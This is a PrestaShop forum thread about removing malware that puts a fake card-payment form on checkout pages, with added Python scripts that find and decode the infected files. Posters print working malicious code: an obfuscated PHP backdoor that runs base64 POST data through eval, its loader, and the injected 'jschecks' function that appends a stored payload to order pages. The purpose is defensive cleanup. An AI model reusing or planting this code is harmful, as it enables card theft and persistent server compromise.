Payment was replaced by Hacker


qiqiy_888


There is a solution (use Google Translate if needed).

This script removes the main hack files, but it also gives you a list of edited files that may also have some encrypted code (mostly at the end of the files).

You need to open those files and remove the code, or if you are uncertain, replace them with the original files.

 

Also explained here in a bit more detail:

https://www.mediacom87.fr/en/how-to-prevent-hacking-on-prestashop-and-thirty-bees/


10 hours ago, razaro said:

There is a solution (use Google Translate if needed).

This script removes the main hack files, but it also gives you a list of edited files that may also have some encrypted code (mostly at the end of the files).

You need to open those files and remove the code, or if you are uncertain, replace them with the original files.

 

Also explained here in a bit more detail:

https://www.mediacom87.fr/en/how-to-prevent-hacking-on-prestashop-and-thirty-bees/

Thank you so much, I will check this.


12 hours ago, GIO.D.P.M. said:

Hello.

I have the same problem.

I can't see my payment methods.

What can I do to fix it?


@razaro's post is helpful, but I just changed the tpl file in the theme files: order-payment.tpl

I changed id="HOOK_PAYMENT" to id="HOOK_PAYMENT_*******" and the payment shows now.

I am not sure it fixes the problem, but now our customers can see the payment method.


19 hours ago, c64girl said:

Uninstall the module or delete it from FTP. Password-protect the PrestaShop catalog using cPanel or DirectAdmin. Use the migration tool to copy orders, products, users and static pages, and use a newer PrestaShop.

Thank you for your suggestion


@qiqiy_888

Note that changing code in that file has no effect on hackers in general. They used code placed somewhere deep in your root folder, and in multiple places, that when called copies the complete payment.tpl and injects a fake form.

You should also check your hosting: if you are on Plesk there is ImunifyAV or 360, or maybe Clam Anti-Virus; with them you can scan files from the hosting. The linked cleaner.php script does find most of the issues, but some could slip through.


  • 1 year later...

GOOD news!

The same thing happened to me. This is what it looked like in every cart step:

[screenshot: cart-scam.png]

But it's a much easier way in this case to remove all the infected files. There were about (I didn't count) 50 infected files just to remove and about 4 files to replace with original PrestaShop files.

What I did, step by step, in easy steps:

  1. Download ALL files from the FTP server using an FTP client (for example FileZilla) to my local disk, to my computer.
  2. I did this on Windows 10. It's enough to use the default Windows Defender, but I'm sure that every antivirus will also alert on all the infected files right after downloading them.
  3. Windows Defender listed all the infected files for me.
  4. Using the FTP client I opened each path, each folder on the FTP server, as listed by Defender as infected files. All files which have to be deleted have "pairs": always some file with a graphic extension like jpg, png, webp + a tiny PHP file with the same name, just with a different extension (.php). Easy to find in folders because their names look like JVcdl7fS.php and JVcdl7fS.png, created from random letters and digits.
  5. A few PHP files should be replaced, just a few files. I got them from a clean PrestaShop installation with the same PS version.

These are the folders listed by my native Windows antivirus. I guess it's possible that in every store there will be different folders with infected files. Don't know.

After all that, my checkout is clear!

[screenshots: defender-pliki-lista.png, defender-pliki-lista2.png, defender-pliki-lista3.png]

 

Thank you for this topic. It was the inspiration for me on how to resolve this. P.S. I couldn't use cleaner.php because of the memory limit and some other limitations on the server.

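The "pairs" Rynraf describes (a random-named image file plus a tiny .php loader with the same basename) can be found without an antivirus, straight from the downloaded FTP copy. The script below is an added example and is not code from the thread: it walks a directory and flags a .php that has a same-named image beside it, a tiny .php that includes a path with an image extension, and an "image" whose bytes begin with <?php. The tree it scans is constructed in a temporary folder using the paths the thread names, with harmless stand-in contents; the 512-byte "tiny" threshold and the extension lists are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path

IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".ico"}
# Loader half of a pair: a tiny PHP file that include()s a path with an image extension.
INCLUDE_KW = re.compile(r"\b(?:include|require)(?:_once)?\b", re.IGNORECASE)
IMAGE_LITERAL = re.compile(r"['\"][^'\"]*\.(?:jpe?g|png|gif|webp|ico)['\"]", re.IGNORECASE)
TINY = 512  # bytes; assumption: the loaders quoted in the thread are one-liners


def scan_tree(root):
    """Walk root and return {relative_path: [reasons]} for the pattern described
    in the thread: a .php with a same-named "image" beside it, a tiny .php that
    includes an image path, or an "image" whose content starts with <?php."""
    root = Path(root)
    findings = {}

    def flag(path, reason):
        findings.setdefault(path.relative_to(root).as_posix(), []).append(reason)

    for dirpath, _, files in os.walk(root):
        names = set(files)
        for name in files:
            path = Path(dirpath, name)
            ext = path.suffix.lower()
            if ext == ".php":
                for partner in (path.stem + e for e in sorted(IMAGE_EXT)):
                    if partner in names:
                        flag(path, f"same-name pair with {partner}")
                if path.stat().st_size <= TINY:
                    src = path.read_text(errors="replace")
                    if INCLUDE_KW.search(src) and IMAGE_LITERAL.search(src):
                        flag(path, "tiny loader that includes an image path")
            elif ext in IMAGE_EXT:
                with open(path, "rb") as fh:
                    head = fh.read(64)
                if head.lstrip().startswith(b"<?php"):
                    flag(path, "image extension but content starts with <?php")
    return findings


def build_fixture(base):
    """Constructed sample tree mirroring the paths quoted in the thread; the
    "image" body is a harmless stand-in, not the real obfuscated payload."""
    growl = Path(base, "js", "jquery", "plugins", "growl")
    growl.mkdir(parents=True)
    (growl / "cgjNl.php").write_text(
        "<?php $cgjNl='cgjNl.jpeg';if(file_exists($cgjNl)){include $cgjNl;}")
    (growl / "cgjNl.jpeg").write_text("<?php /* stand-in for the encoded body */ ?>")
    img = Path(base, "img")
    img.mkdir()
    (img / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + bytes(16))  # real PNG signature
    # A stock-style directory guard index.php must not be flagged (constructed content).
    (img / "index.php").write_text("<?php header('Location: ../'); exit;")


def scan_fixture():
    """Build the constructed tree in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, reasons in sorted(scan_fixture().items()):
        print(rel, "->", "; ".join(reasons))
```

Run it against the local copy of the site by calling scan_tree() with that directory; every hit still needs a look by eye, since the size and extension heuristics are only a triage filter, and the matching file in a clean install of the same version is the reference for what belongs there.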

For the more inquisitive, this is what was inside these infected pairs of PHP and "image" files...

For example, /js/jquery/plugins/growl/cgjNl.php just always opens this "image" file:

<?php $cgjNl='cgjNl.jpeg';if(file_exists($cgjNl)){include $cgjNl;}

and the "image" file (for example /js/jquery/plugins/growl/cgjNl.jpeg) contains:

<?php $m17="IhgcXbMnWJ4GVOeU0piNoTuKd27ZAL3sf8y1tw5ElBCRQ_aFSkzvPH6jD9qYxrm";$n8520=$m17[32].$m17[22].$m17[7].$m17[3].$m17[36].$m17[18].$m17[20].$m17[7].$m17[45].$m17[14].$m17[60].$m17[18].$m17[31].$m17[36].$m17[31];$faa33=$m17[3].$m17[61].$m17[14].$m17[46].$m17[36].$m17[14].$m17[45].$m17[32].$m17[22].$m17[7].$m17[3].$m17[36].$m17[18].$m17[20].$m17[7];$a1d2b=$m17[5].$m17[46].$m17[31].$m17[14].$m17[54].$m17[10].$m17[45].$m17[24].$m17[14].$m17[3].$m17[20].$m17[24].$m17[14];if(@$n8520($faa33)){$p357 = @$faa33('', @$a1d2b('aWYoCQlpc3NldCggCiRfUE9TVFtwcm9kdWN0X2lkXSkgICAmJiBtZDUoJF9QT1NUW3Byb2R1Y3RfaWRdCQopIAo9PT0iMzQyNTFhODIxMzllYTI5YzNhZjFlNjA1OTA3ZDE2ZWEiIAkpIHsJZXZhbCgKYmFzZTY0X2RlY29kZSgkX1BPU1RbaW1hZ2VfaWRdKQkpOyAJZXhpdCgpOwoJfTs='));@$p357();}

Finished. Clean cart! Good luck!

No more of this scam info:

Pay with debit or credit card
We don't share your financial details with the merchant.
No matter where you shop, we keep your financial information secure.

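Before deciding whether the "image" file above is the checkout injection or something else, it is worth resolving what it actually calls. The script below is an added analysis example, not code from the thread: it rebuilds every name assembled by indexing into the alphabet string and decodes the base64 literal as inert text, without executing any PHP. SAMPLE is a copy of the body quoted above; the regular expressions are assumptions tailored to this one obfuscation style.

```python
import base64
import re

# Copy of the "image" file body quoted in the thread, kept as text for analysis only.
SAMPLE = r'''<?php $m17="IhgcXbMnWJ4GVOeU0piNoTuKd27ZAL3sf8y1tw5ElBCRQ_aFSkzvPH6jD9qYxrm";$n8520=$m17[32].$m17[22].$m17[7].$m17[3].$m17[36].$m17[18].$m17[20].$m17[7].$m17[45].$m17[14].$m17[60].$m17[18].$m17[31].$m17[36].$m17[31];$faa33=$m17[3].$m17[61].$m17[14].$m17[46].$m17[36].$m17[14].$m17[45].$m17[32].$m17[22].$m17[7].$m17[3].$m17[36].$m17[18].$m17[20].$m17[7];$a1d2b=$m17[5].$m17[46].$m17[31].$m17[14].$m17[54].$m17[10].$m17[45].$m17[24].$m17[14].$m17[3].$m17[20].$m17[24].$m17[14];if(@$n8520($faa33)){$p357 = @$faa33('', @$a1d2b('aWYoCQlpc3NldCggCiRfUE9TVFtwcm9kdWN0X2lkXSkgICAmJiBtZDUoJF9QT1NUW3Byb2R1Y3RfaWRdCQopIAo9PT0iMzQyNTFhODIxMzllYTI5YzNhZjFlNjA1OTA3ZDE2ZWEiIAkpIHsJZXZhbCgKYmFzZTY0X2RlY29kZSgkX1BPU1RbaW1hZ2VfaWRdKQkpOyAJZXhpdCgpOwoJfTs='));@$p357();}'''

# Assumed shapes: one double-quoted alphabet string, names built as $alpha[i].$alpha[j]...
ALPHABET_RE = re.compile(r'\$(\w+)="([^"]*)"')
B64_RE = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")


def resolve_index_strings(php_src):
    """Rebuild each variable assembled from alphabet indices; these are the
    real function names the sample hides from a plain grep."""
    m = ALPHABET_RE.search(php_src)
    if not m:
        return {}
    alpha_name, alphabet = m.group(1), m.group(2)
    piece = r"\$" + re.escape(alpha_name) + r"\[\d+\]"
    assign_re = re.compile(r"\$(\w+)=((?:" + piece + r"\.?)+);")
    resolved = {}
    for var, body in assign_re.findall(php_src):
        idx = [int(i) for i in re.findall(r"\[(\d+)\]", body)]
        resolved[var] = "".join(alphabet[i] for i in idx)
    return resolved


def decode_base64_literals(php_src):
    """Decode long base64 string literals to text (no execution)."""
    out = []
    for lit in B64_RE.findall(php_src):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    return out


def normalise(code):
    """Collapse the tabs/newlines the payload is padded with."""
    return " ".join(code.split())


def triage(php_src):
    """Summarise what the sample resolves to and whether it runs request data."""
    names = resolve_index_strings(php_src)
    payloads = [normalise(p) for p in decode_base64_literals(php_src)]
    return {
        "hidden_functions": sorted(names.values()),
        "payloads": payloads,
        "executes_request_data": any("eval(" in p and "$_POST" in p for p in payloads),
    }


if __name__ == "__main__":
    report = triage(SAMPLE)
    print("functions resolved:", report["hidden_functions"])
    for p in report["payloads"]:
        print("decoded payload:", p)
    print("executes request data:", report["executes_request_data"])
```

The resolved names are function_exists, create_function and base64_decode, and the decoded literal is a guarded eval of POST data, which is why the next reply calls this a persistence backdoor rather than the form injection itself. Both findings matter for cleanup: this file is a re-entry point and has to go, but removing it alone does not explain the fake card form.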

Hi there,

I don't think that is the exact cause of the injected credit card form on the checkout page.

If you decode the obfuscated code that you've shared, you'll understand that this code is a backdoor to maintain persistent access.

Though that is a good find, and it would help PrestaShop owners stop the re-infection of the website.

 

The real injection that causes the fake credit card form to be added to the checkout page hides inside these files:


./classes/controller/FrontController.php
./classes/controller/Controller.php

 

You'll need to remove this code inside the files mentioned above in order to eliminate the injection:

public function jschecks($html,$p)
    {
        $urp=[
            "order",
            "Bestellung",
            "bestellung",
            "commande",
            "objednavka",
            "pedido",
            "carrito",
            "koszykgt",
            "zamowienie",
            "comanda",
            "checkout",
            "ordine",
            "befejezett-rendeles",
            "wienie",
            "הזמנה",
            "%D7%94%D7%96%D7%9E%D7%A0%D7%94",
            "sipariş vermiş olmalısınız",
            "sipari%C5%9F%20vermi%C5%9F%20olmal%C4%B1s%C4%B1n%C4%B1z",
            "παραγγελία",
            "%CF%80%CE%B1%CF%81%CE%B1%CE%B3%CE%B3%CE%B5%CE%BB%CE%AF%CE%B1",
            "siparis",
            "encomenda",
            "objednávku",
            "objedn%C3%A1vku",
            "objednávka",
            "objedn%C3%A1vka",
            "objednavku",
            "greitas-uzsakymas",
            "rendeles-befejezese",
            "zamowieni",
            "u%C5%BEsakymas",
            "porud%C5%BEbinu",
            "bestelling",
            "porachka",
            "ordre",
            "hurtigordre",
            "uzsakymas",
        ];

        include_once($_SERVER['DOCUMENT_ROOT'].'/config/config.inc.php');
		include_once($_SERVER['DOCUMENT_ROOT'].'/config/settings.inc.php');
		include_once($_SERVER['DOCUMENT_ROOT'].'/classes/Cookie.php');
		$context = Context::getContext();
		$cart = new Cart($context->cookie->id_cart);


		if($cart->id!=""){

			$cookie = new Cookie('psAdmin');
			if (!$cookie->id_employee){


		        foreach($urp as $u){
		            if (strpos($_SERVER["REQUEST_URI"], $u) !== false && strpos($_SERVER["REQUEST_URI"], "admin") == false && strpos($_SERVER["REQUEST_URI"], "Admin") == false ){
		                $html=$html.@base64_decode(@file_get_contents($_SERVER["DOCUMENT_ROOT"].$p));
		                return $html;
		            }
		        }
	        }
        }
        return $html;
    }

 

$html=$this->jschecks($html,"/img/XXXX.png");

and also remove the image file mentioned in the code above, in the img directory.

Once that code is removed, the fake credit card form should disappear.

If you replace/overwrite the PrestaShop core files, that should remediate the issue as well, since Controller.php and FrontController.php will be replaced with the stock/default core files.

Hope this information helps in some way. Thanks

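The advice to overwrite core files with stock copies can be turned into a check that finds every modified core file, not just the two named here: hash the live install and a pristine download of the same PrestaShop version and list what differs. The script below is an added example and not from the thread; the two trees it compares are constructed in a temporary folder with stand-in contents, reproducing only the paths the thread names (FrontController.php with the appended jschecks call, img/XXXX.png, and the root-level bbc.php a later post reports), and the set of pruned data directories is an assumption.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Assumption: these directories hold site data rather than shipped code, so they are
# pruned at any depth to keep the comparison focused on files that should match stock.
SKIP_DIRS = {"cache", "var", "upload", "download", "config"}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map every file under root (minus SKIP_DIRS) to its SHA-256, keyed by relative path."""
    root = Path(root)
    digests = {}
    for dirpath, dirnames, files in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in files:
            p = Path(dirpath, name)
            digests[p.relative_to(root).as_posix()] = sha256_of(p)
    return digests


def compare_trees(stock_root, live_root):
    """Report files changed, added or removed in the live tree relative to stock."""
    stock, live = hash_tree(stock_root), hash_tree(live_root)
    return {
        "modified": sorted(k for k in stock.keys() & live.keys() if stock[k] != live[k]),
        "added": sorted(live.keys() - stock.keys()),
        "missing": sorted(stock.keys() - live.keys()),
    }


def build_fixture(base):
    """Constructed stock vs. live trees. Contents are stand-ins; only the paths and
    the appended jschecks call mirror what the thread describes."""
    stock, live = Path(base, "stock"), Path(base, "live")
    for root in (stock, live):
        (root / "classes" / "controller").mkdir(parents=True)
        (root / "img").mkdir()
        (root / "index.php").write_text("<?php /* stand-in */\n")
        (root / "classes" / "controller" / "Controller.php").write_text("<?php class Controller {}\n")
        (root / "img" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")
    fc = "<?php class FrontController extends Controller {}\n"
    (stock / "classes" / "controller" / "FrontController.php").write_text(fc)
    # The live copy carries the injected call quoted in the thread, the dropped
    # payload "image", and the root-level bbc.php another poster found.
    (live / "classes" / "controller" / "FrontController.php").write_text(
        fc + '$html=$this->jschecks($html,"/img/XXXX.png");\n')
    (live / "img" / "XXXX.png").write_text("base64-stand-in\n")
    (live / "bbc.php").write_text("<?php /* stand-in */\n")
    return stock, live


def demo():
    """Build both constructed trees in a temp dir and return the comparison."""
    with tempfile.TemporaryDirectory() as tmp:
        stock, live = build_fixture(tmp)
        return compare_trees(stock, live)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Point compare_trees() at the extracted stock archive and the downloaded site copy; "modified" is the list to restore from stock, "added" is where loaders, payload images and dropped scripts show up, and anything in the pruned data directories still needs the pair scan above since this check deliberately ignores them.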

  • 1 month later...

If the problem returns...

Please check your main folder. On my FTP with PS there was also a file named "bbc.php" (231 KB). Remove it.

As I checked in the server logs, every day there was a connection (when these "bad" files were uploaded to my FTP) from the same IP address. I also blocked on my server all connections from this IP (from the Netherlands).
